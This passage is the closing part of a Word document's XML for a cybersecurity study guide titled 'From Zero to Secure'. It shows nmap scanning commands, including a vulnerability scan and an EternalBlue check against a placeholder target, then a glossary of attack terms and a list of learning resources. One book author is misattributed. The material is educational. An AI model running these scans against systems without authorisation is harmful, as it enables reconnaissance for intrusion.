          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- target                  # All ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script vuln target        # Vuln scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script smb-vuln-ms17-010  # EternalBlue check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -oX scan.xml target         # XML output for Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B: Glossary of Key Terms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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7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Advanced Persistent Threat - sophisticated, long-term targeted attack</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C2 / C&amp;C</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Command and Control - infrastructure attackers use to communicate with compromised hosts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CIA Triad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Confidentiality, Integrity, Availability - core information security framework</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CVE</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Common Vulnerabilities and Exposures - standardized vulnerability identifier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DLL Injection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Technique to inject code into a running process via a Dynamic Link Library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EDR</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Endpoint Detection and Response - advanced endpoint security platform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EternalBlue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MS17-010 SMBv1 exploit used in WannaCry ransomware campaign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GPO</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Group Policy Object - settings deployed to domain computers via Active Directory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HID Attack</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Human Interface Device attack - malicious keyboard/mouse emulation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IOC</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Indicator of Compromise - artifact indicating a system has been compromised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LOLBIN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Living Off the Land Binary - using built-in OS tools for attack</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Meterpreter</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Advanced Metasploit payload that runs in memory on compromised systems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MITRE ATT&amp;CK</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Framework documenting adversary tactics, techniques, and procedures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NTLM</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NT LAN Manager - Windows authentication protocol (often abused via PtH)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OPSEC</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Operational Security - practices to minimize attacker footprint and exposure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Pivot</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Using a compromised host to attack systems not directly accessible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PTH</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Pass-the-Hash - authenticating using a credential hash without knowing plaintext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Red Team</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Simulates real attackers to test organizational defenses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SIEM</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Security Information and Event Management - centralized log analysis platform</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SUID</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Set User ID - Linux permission bit that runs a file as its owner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TTL</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 to Live - IP field that limits packet lifespan; also used in OS fingerprinting</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Zero-Day</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Vulnerability with no available patch; often actively exploited before disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix C: Recommended Learning Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Books:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Hacker Playbook series (Tim Bryant) - practical penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing (Georgia Weidman) - comprehensive beginner to intermediate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Web Application Hacker's Handbook - essential for web testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Development and Operations (Joe Vest) - advanced red team operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Online Platforms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox (hackthebox.com) - industry standard labs and CTFs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe (tryhackme.com) - beginner-friendly guided paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PentesterLab (pentesterlab.com) - focused web security exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnHub (vulnhub.com) - download vulnerable VMs for local practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">YouTube Channels:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IppSec - Retired HTB machine walkthroughs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">John Hammond - CTF walkthroughs and security tutorials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Cyber Mentor (TCM Security) - beginner to intermediate content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LiveOverflow - Deep technical security research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Communities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">r/netsec - Professional security research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">r/hacking and r/AskNetSec - Q&amp;A and discussion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hack The Box Discord and Forums</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DC615, DC540, and local DEF CON groups</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">"The quieter you become, the more you can hear."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">— Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="607080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">From Zero to Secure - v1.0 - 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Gary Holden Schneider (Eros) | GitHub: Gnosisone</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId6"/>
      <w:footerReference w:type="default" r:id="rId7"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType/>
      <w:titlePg w:val="fals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8A9A" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="607080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Gary Holden Schneider (Eros)</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="607080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="607080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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8A9A" w:sz="6" w:space="1"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="607080"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">FROM ZERO TO SECURE  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A3A5C"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Computer Information Science &amp; Security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1A3A5C"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A3A5C"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="100"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E5F8A"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E5F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2026-03-05T16:17:37.550Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T16:17:37.553Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>